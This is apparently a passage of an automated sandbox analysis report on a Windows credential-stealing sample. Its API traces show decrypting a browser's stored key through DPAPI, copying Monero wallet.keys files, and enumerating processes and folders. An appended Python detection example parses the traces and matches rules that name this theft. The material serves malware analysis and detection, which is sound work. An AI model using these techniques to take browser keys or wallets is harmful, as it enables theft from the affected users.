                  • Opcode Fuzzy Hash: ec9cf47b7f0e7f9b582fabc4dbcdfb0279ecf6b1f179e095f53319d5a06e1f6c
                  • Instruction Fuzzy Hash: 5201E975500508FFCB15DFE8C984EAE7BB9EB88351F108148F9098B200C675AA40DB91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001312B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 001312BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001312D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001312F5
                  • RegCloseKey.ADVAPI32(?), ref: 001312FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 4fb816a8615855df71086d984ce73cd5795c23a6fc1586832aec5b32eb3ab765
                  • Instruction ID: 4a8a138109d914b3eaf4ae07531a1e05cde4aca994adeb4971589c7f8d2ac90e
                  • Opcode Fuzzy Hash: 4fb816a8615855df71086d984ce73cd5795c23a6fc1586832aec5b32eb3ab765
                  • Instruction Fuzzy Hash: 3F0131B9A40208BBDB14DFE0DC49FAEBBBCEB88701F108159FA0997280D6709A418F51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: f9113e336b9cd486864e56d0255b144a30f1cfb047453740d21c0bb8c2ca284a
                  • Instruction ID: 8d69854233bbaf026fee0aaf42c58cd812b80edf92ba61a24234baec645c1ab9
                  • Opcode Fuzzy Hash: f9113e336b9cd486864e56d0255b144a30f1cfb047453740d21c0bb8c2ca284a
                  • Instruction Fuzzy Hash: 3941E77150179CAEDB258B24CC94FFBBBE8AF45708F1444E8E98A86192D3719A45CFA0
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00146663
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00146726
                  • ExitProcess.KERNEL32 ref: 00146755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 80919e1c4e1c984cd21e60634b3fc8f1f32bda11f16e400b45cf924ff2dc3bea
                  • Instruction ID: bf5de7e6702b7207384180e3ff25cf2055e89311a7a096dd3e39a374486d69ea
                  • Opcode Fuzzy Hash: 80919e1c4e1c984cd21e60634b3fc8f1f32bda11f16e400b45cf924ff2dc3bea
                  • Instruction Fuzzy Hash: 783130B1C41218ABDB15EB90DC91FDD777CAF54300F804199F209661A1DF746B89CF56
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00150E28,00000000,?), ref: 0014882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00148836
                  • wsprintfA.USER32 ref: 00148850
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 77e3dab9dcbe115983e122e35b03b407348abf8123a5fe80a23f9c60546845e9
                  • Instruction ID: 31b6629b70f01d60b4855ae8c880609595a10628ad41cb290290c22ec4429c8a
                  • Opcode Fuzzy Hash: 77e3dab9dcbe115983e122e35b03b407348abf8123a5fe80a23f9c60546845e9
                  • Instruction Fuzzy Hash: DD2160B1A40604BFDB14DFD4DD45FAEBBB8FB48701F104159F609A7290C77999008BA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0014951E,00000000), ref: 00148D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00148D62
                  • wsprintfW.USER32 ref: 00148D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: bbd8d19e24a39c1232fad58ca42e72cbb25dfbb28bdc9afe56fe9de742936de5
                  • Instruction ID: ed93383a2f19e8a91af057838049a618d4898efddd721d9b5fa1ef4c098b34fe
                  • Opcode Fuzzy Hash: bbd8d19e24a39c1232fad58ca42e72cbb25dfbb28bdc9afe56fe9de742936de5
                  • Instruction Fuzzy Hash: 5DE08CB0A40208FBC720DBD4DC0AE6D7BFCEB88702F040094FD0D87280DA719E408BA2
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0013A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0013A6BC
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0013A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: f747d216a86f717f3f7ff54b4b3a1ccdd7ac6af3c6533b0a7b926ee38028cd6c
                  • Instruction ID: 7f95f7f3f540392f204e7d0e44053c303663e9d6c7cd29fc15c88978212ca0f0
                  • Opcode Fuzzy Hash: f747d216a86f717f3f7ff54b4b3a1ccdd7ac6af3c6533b0a7b926ee38028cd6c
                  • Instruction Fuzzy Hash: ADE11372850108ABEB15FBA4DC92EEE733CEF64305F918159F516760A1EF306A4DCB62
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013D481
                  • lstrlen.KERNEL32(00000000), ref: 0013D698
                  • lstrlen.KERNEL32(00000000), ref: 0013D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0013D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 944510f3d575a61b960ffae23f87f07eb524aa82e161b8fbb1d78a59cf1e88fa
                  • Instruction ID: 20ec0dd517c2e32346c91c63717b9c2e41658d17c1b0268b43c2b73ce1232c47
                  • Opcode Fuzzy Hash: 944510f3d575a61b960ffae23f87f07eb524aa82e161b8fbb1d78a59cf1e88fa
                  • Instruction Fuzzy Hash: AA9135728901099BEB15FBA0DC92DEE733CEF64305F924168F517660A1EF346A49CB62
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013D801
                  • lstrlen.KERNEL32(00000000), ref: 0013D99F
                  • lstrlen.KERNEL32(00000000), ref: 0013D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0013DA32
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9cb0e938468f52de3c9177df69366c9ab6b19b306df67bba438eeb4ad3aa9cc5
                  • Instruction ID: 55f10ab8bc79d57919a71d1fc8a38a0bea4a4aa792f7b466147cac2d232c52ea
                  • Opcode Fuzzy Hash: 9cb0e938468f52de3c9177df69366c9ab6b19b306df67bba438eeb4ad3aa9cc5
                  • Instruction Fuzzy Hash: 468125729501059BEB15FBA0DC52DEE733DEF64305F924528F407A60B1EF346A49CB62
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 73c0778fc56be51d9e16aee0ede87d53799441c1ea2f5c0caa164515fe3db45f
                  • Instruction ID: 06040138e3048519500ec4cbb34006b18ac57a8a5486e24934749537ee6907f7
                  • Opcode Fuzzy Hash: 73c0778fc56be51d9e16aee0ede87d53799441c1ea2f5c0caa164515fe3db45f
                  • Instruction Fuzzy Hash: 23417FB1D10109EFDB04EFE4D845AEEB778AF58305F518018F426772A1DB35AA49CFA2
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00139D39
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
                    • Part of subcall function 00139AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00134EEE,00000000,?), ref: 00139B01
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139B2A
                    • Part of subcall function 00139AC0: LocalFree.KERNEL32(?,?,?,?,00134EEE,00000000,?), ref: 00139B3F
                    • Part of subcall function 00139B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00139B84
                    • Part of subcall function 00139B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00139BA3
                    • Part of subcall function 00139B60: LocalFree.KERNEL32(?), ref: 00139BD3
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 8902fb26e78a9985baebcfd494f96a1d2c038292be1f47f6503d306f05336a42
                  • Instruction ID: f754df688d599622b2d953771d8afb842e2d779776529d3e2ccfb015c378d5e1
                  • Opcode Fuzzy Hash: 8902fb26e78a9985baebcfd494f96a1d2c038292be1f47f6503d306f05336a42
                  • Instruction Fuzzy Hash: 5A3140B6D10209ABCF14EFE4DC86EEFB7B8BF58304F144519E915A7241EB749A04CBA1
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001505B7), ref: 001486CA
                  • Process32First.KERNEL32(?,00000128), ref: 001486DE
                  • Process32Next.KERNEL32(?,00000128), ref: 001486F3
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • CloseHandle.KERNEL32(?), ref: 00148761
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 561fb8d0ad0d09a48edfc0c47e4b29b8e3b675c6afb6bf4e3b64dbabfcf758f3
                  • Instruction ID: b13949a5ed13a3f5ac5c117aa910e5178bbbeb911a0ddf1bb719043f5f930b37
                  • Opcode Fuzzy Hash: 561fb8d0ad0d09a48edfc0c47e4b29b8e3b675c6afb6bf4e3b64dbabfcf758f3
                  • Instruction Fuzzy Hash: 2A318BB1941218ABDB25DF90CC91FEEB778EF54701F514199E10AA21A0DB306A84CFA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00150E00,00000000,?), ref: 001479B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 001479B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00150E00,00000000,?), ref: 001479C4
                  • wsprintfA.USER32 ref: 001479F3
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 09bd579287ed7bc3a42717faa7f9b5cf083bc5431612ee8385e6b4f0c8ccedee
                  • Instruction ID: ce303a0213fff2a3c1d3c83c06d46499d494ee159dc6e83cc9596d5cc221149a
                  • Opcode Fuzzy Hash: 09bd579287ed7bc3a42717faa7f9b5cf083bc5431612ee8385e6b4f0c8ccedee
                  • Instruction Fuzzy Hash: 141118B2904518AACB249FC9DD45BBEBBFCEB4CB11F14425AF605A2290D3395940C7B1
                  APIs
                  • CreateFileA.KERNEL32(00143AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00143AEE,?), ref: 001492FC
                  • GetFileSizeEx.KERNEL32(000000FF,00143AEE), ref: 00149319
                  • CloseHandle.KERNEL32(000000FF), ref: 00149327
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: 965ce75c5d54e75e02e37aa2595b1eb74200ce1f18d0fbb0ae650482e0ddaf7f
                  • Instruction ID: b405183fe58712042e3d323e203d9484a4094379f86bc7df39b2443282eba695
                  • Opcode Fuzzy Hash: 965ce75c5d54e75e02e37aa2595b1eb74200ce1f18d0fbb0ae650482e0ddaf7f
                  • Instruction Fuzzy Hash: 38F04979E44208BBDB24DFF0DC49F9E77B9BB88721F11C254BA55A72D0D770AA418B40
                  APIs
                  • __getptd.LIBCMT ref: 0014C74E
                    • Part of subcall function 0014BF9F: __amsg_exit.LIBCMT ref: 0014BFAF
                  • __getptd.LIBCMT ref: 0014C765
                  • __amsg_exit.LIBCMT ref: 0014C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0014C797
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 93e21367fe7243f08bc01ac59e52a207d842b21fc1a4e32b48895c84cee4190f
                  • Instruction ID: 559a86e834c3e5421294987819d79e94332504ad59f80e3c4d95b133feab90dd
                  • Opcode Fuzzy Hash: 93e21367fe7243f08bc01ac59e52a207d842b21fc1a4e32b48895c84cee4190f
                  • Instruction Fuzzy Hash: EEF0E93294A700DBD760BBB8588775E33A06F10723F654149F414AB1F3DF6499409FD6
                  APIs
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00144F7A
                  • lstrcat.KERNEL32(?,00151070), ref: 00144F97
                  • lstrcat.KERNEL32(?,010288C0), ref: 00144FAB
                  • lstrcat.KERNEL32(?,00151074), ref: 00144FBD
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 0014492C
                    • Part of subcall function 00144910: FindFirstFileA.KERNEL32(?,?), ref: 00144943
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FDC), ref: 00144971
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FE0), ref: 00144987
                    • Part of subcall function 00144910: FindNextFileA.KERNEL32(000000FF,?), ref: 00144B7D
                    • Part of subcall function 00144910: FindClose.KERNEL32(000000FF), ref: 00144B92
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 8ca8216d7f199a66644385ecc16a19d18a53e6e8bf8f4bd9049cd9e654b85228
                  • Instruction ID: b7d3a0392f5f07f72890799caabb50d956767b3dd40d054baa646c351909ace9
                  • Opcode Fuzzy Hash: 8ca8216d7f199a66644385ecc16a19d18a53e6e8bf8f4bd9049cd9e654b85228
                  • Instruction Fuzzy Hash: 1621DA76900208B7C765FBB0DC46EED337CABA9301F004548B69D97191EF749AC88B93
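The API traces above describe four distinct behaviours that a detection engineer would want to pick out of a report like this one: the function around ref 00139D39 opens a file, searches it for `"encrypted_key":"`, base64-decodes the value (the third CryptStringToBinaryA argument, 00000001, is CRYPT_STRING_BASE64) and passes it to CryptUnprotectData, which together with the `DPAPI` string in its String ID is the sequence used to recover a Chromium-based browser's os_crypt master key from its Local State file; the function around ref 001486CA walks the process list with CreateToolhelp32Snapshot (flag 00000002 is TH32CS_SNAPPROCESS) and Process32First/Next; the functions around refs 0013D481 and 0013D801 build paths ending in `\Monero\wallet.keys` and CopyFileA/DeleteFileA them; and the function around ref 00144F7A resolves CSIDL 0000001C (CSIDL_LOCAL_APPDATA) with SHGetFolderPathA and enumerates it with FindFirstFileA/FindNextFileA. The following is an added example, not code from Joe Sandbox or from the sample: it parses API lines in exactly the format printed in this report into structured records, decodes the Win32 constants named above, and matches each function's trace against simple behaviour rules. The rule names, the constants table and the two sample traces (copied from the report's own API lines) are this example's assumptions; note that `?` arguments are unresolved by the sandbox and that the parser splits arguments on commas, which is fine for the lines on this page but would break on a string argument that itself contains a comma.

```python
import re
from dataclasses import dataclass

# One report API line: optional bullet, optional "Part of subcall function XXXXXXXX: ",
# API.MODULE, optional "(args)", optional ", ref: XXXXXXXX".
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref: (?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple    # raw argument strings as printed ("?" means unresolved)
    ref: str       # address of the call site
    subcall: str   # callee address for "Part of subcall function" lines, else ""


def parse_api_line(line):
    """Return an ApiCall for a report API line, or None for any other report line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Arguments are comma separated; a string argument containing a comma would be
    # split here (none of the lines in this report have one).
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    return ApiCall(m.group("api"), m.group("mod"), args,
                   m.group("ref") or "", m.group("sub") or "")


def parse_trace(text):
    """Extract every API line from a block of report text, skipping all other lines."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


@dataclass(frozen=True)
class Rule:
    name: str
    apis: frozenset             # every API in this set must appear in the trace
    arg_substrings: tuple = ()  # if non-empty, some argument must contain one of these


# Behaviour rules derived from the API sets in this report (rule names are assumed).
RULES = (
    Rule("chromium_local_state_key_decrypt",
         frozenset({"StrStrA", "CryptStringToBinaryA", "CryptUnprotectData"}),
         ('"encrypted_key":"',)),
    Rule("process_enumeration",
         frozenset({"CreateToolhelp32Snapshot", "Process32First", "Process32Next"})),
    Rule("wallet_file_copy_and_delete",
         frozenset({"CopyFileA", "DeleteFileA"}), ("wallet.keys",)),
    Rule("user_profile_file_discovery",
         frozenset({"SHGetFolderPathA", "FindFirstFileA", "FindNextFileA"})),
)


def match_rules(calls, rules=RULES):
    """Return the names of every rule satisfied by one function's API trace."""
    seen = {c.api for c in calls}
    blob = " ".join(a for c in calls for a in c.args)
    return [r.name for r in rules
            if r.apis <= seen
            and (not r.arg_substrings or any(s in blob for s in r.arg_substrings))]


# Symbolic names for argument values fixed by the Win32 API contract, keyed by (API, arg index).
KNOWN_CONSTANTS = {
    ("CreateToolhelp32Snapshot", 0): {"00000002": "TH32CS_SNAPPROCESS"},
    ("SHGetFolderPathA", 1): {"0000001C": "CSIDL_LOCAL_APPDATA"},
    ("CryptStringToBinaryA", 2): {"00000001": "CRYPT_STRING_BASE64"},
    ("CreateFileA", 1): {"80000000": "GENERIC_READ"},
    ("CreateFileA", 4): {"00000003": "OPEN_EXISTING"},
    ("CopyFileA", 2): {"00000001": "bFailIfExists=TRUE"},
}


def decode_constants(call):
    """Return [(arg_index, name)] for arguments whose value is a known constant."""
    return [(i, KNOWN_CONSTANTS[(call.api, i)][a.upper()])
            for i, a in enumerate(call.args)
            if a.upper() in KNOWN_CONSTANTS.get((call.api, i), {})]


# Constructed sample traces: API lines copied from two of the functions in this report.
SAMPLE_TRACE_DPAPI = r"""
• Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
• Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
• StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00139D39
• Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
• Part of subcall function 00139B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00139B84
"""

SAMPLE_TRACE_ENUM = r"""
• Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001505B7), ref: 001486CA
• Process32First.KERNEL32(?,00000128), ref: 001486DE
• Process32Next.KERNEL32(?,00000128), ref: 001486F3
• Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
• CloseHandle.KERNEL32(?), ref: 00148761
"""

if __name__ == "__main__":
    for name, text in (("dpapi", SAMPLE_TRACE_DPAPI), ("enum", SAMPLE_TRACE_ENUM)):
        calls = parse_trace(text)
        print(name, match_rules(calls))
        for c in calls:
            for i, sym in decode_constants(c):
                print(f"  {c.api} arg{i} = {c.args[i]} ({sym})")
```

Feeding the whole function listing of a report through `parse_trace` works because the non-API lines (Memory Dump Source, Opcode ID, Similarity and so on) do not match the line pattern and are dropped; run `match_rules` per function entry rather than over the whole report, otherwise APIs from unrelated functions would satisfy a rule together.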